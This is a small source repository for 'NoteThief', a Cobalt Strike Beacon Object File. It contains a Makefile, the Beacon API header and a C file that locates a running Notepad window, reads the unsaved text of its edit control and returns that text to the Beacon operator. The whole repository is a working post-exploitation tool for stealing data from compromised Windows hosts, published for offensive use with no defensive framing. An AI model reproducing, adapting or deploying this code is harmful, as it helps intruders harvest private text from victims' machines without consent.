├── Makefile
├── README.md
├── beacon.h
├── notethief.c
└── notethief.png


/Makefile:
--------------------------------------------------------------------------------
1 | BOFNAME := notethief
2 | CC_x64 := x86_64-w64-mingw32-gcc
3 | 
4 | all:
5 | 	$(CC_x64) -o $(BOFNAME).o -c $(BOFNAME).c
6 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # NoteThief
2 | Grab unsaved Notepad contents with a Beacon Object File
3 | 
4 | 
5 | ![](notethief.png)
6 | 


--------------------------------------------------------------------------------
/beacon.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * Beacon Object Files (BOF)
 3 |  * -------------------------
 4 |  * A Beacon Object File is a light-weight post exploitation tool that runs
 5 |  * with Beacon's inline-execute command.
 6 |  *
 7 |  * Cobalt Strike 4.1.
 8 |  */
 9 | 
10 | /* data API */
11 | typedef struct {
12 | 	char * original; /* the original buffer [so we can free it] */
13 | 	char * buffer;   /* current pointer into our buffer */
14 | 	int    length;   /* remaining length of data */
15 | 	int    size;     /* total size of this buffer */
16 | } datap;
17 | 
18 | DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
19 | DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
20 | DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
21 | DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
22 | DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
23 | 
24 | /* format API */
25 | typedef struct {
26 | 	char * original; /* the original buffer [so we can free it] */
27 | 	char * buffer;   /* current pointer into our buffer */
28 | 	int    length;   /* remaining length of data */
29 | 	int    size;     /* total size of this buffer */
30 | } formatp;
31 | 
32 | DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
33 | DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
34 | DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
35 | DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
36 | DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
37 | DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
38 | DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
39 | 
40 | /* Output Functions */
41 | #define CALLBACK_OUTPUT      0x0
42 | #define CALLBACK_OUTPUT_OEM  0x1e
43 | #define CALLBACK_ERROR       0x0d
44 | #define CALLBACK_OUTPUT_UTF8 0x20
45 | 
46 | DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
47 | DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
48 | 
49 | /* Token Functions */
50 | DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
51 | DECLSPEC_IMPORT void   BeaconRevertToken();
52 | DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
53 | 
54 | /* Spawn+Inject Functions */
55 | DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
56 | DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
57 | DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
58 | DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
59 | 
60 | /* Utility Functions */
61 | DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
62 | 


--------------------------------------------------------------------------------
/notethief.c:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include "beacon.h"
 3 | 
 4 | DECLSPEC_IMPORT WINUSERAPI HWND WINAPI USER32$FindWindowExA (HWND, HWND, LPCSTR, LPCSTR);
 5 | DECLSPEC_IMPORT WINUSERAPI LRESULT WINAPI USER32$SendMessageA (HWND, UINT, WPARAM, LPARAM);
 6 | DECLSPEC_IMPORT WINBASEAPI void *__cdecl MSVCRT$calloc(size_t num, size_t size);  
 7 | 
 8 | void go(){
 9 | 
10 |     char *buffer;
11 |     HWND noteHwnd = NULL;
12 |     HWND editHwnd = NULL;
13 |     int len = 30000;
14 | 
15 |     noteHwnd = USER32$FindWindowExA(NULL, NULL, "Notepad", NULL);
16 |     if (noteHwnd)
17 |     {
18 |         BeaconPrintf(CALLBACK_OUTPUT, "[+] Found Window %x\n", noteHwnd);
19 |         editHwnd = USER32$FindWindowExA(noteHwnd, NULL, "Edit", NULL);
20 |         if (editHwnd)
21 |         {
22 |             buffer = (char*)MSVCRT$calloc(1, len+1);
23 |             USER32$SendMessageA(editHwnd, WM_GETTEXT,len,(LPARAM)buffer);
24 |             BeaconPrintf(CALLBACK_OUTPUT, "[+] %s\n", buffer);
25 |         }
26 |     }
27 |     else
28 |     {
29 |         BeaconPrintf(CALLBACK_ERROR, "Failed to find Notepad Window\n");
30 |     }
31 | }
32 | 


--------------------------------------------------------------------------------
/notethief.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/trainr3kt/NoteThief/3f3c0d1f443fbb752cfe2ac3684850af8d5e7913/notethief.png


--------------------------------------------------------------------------------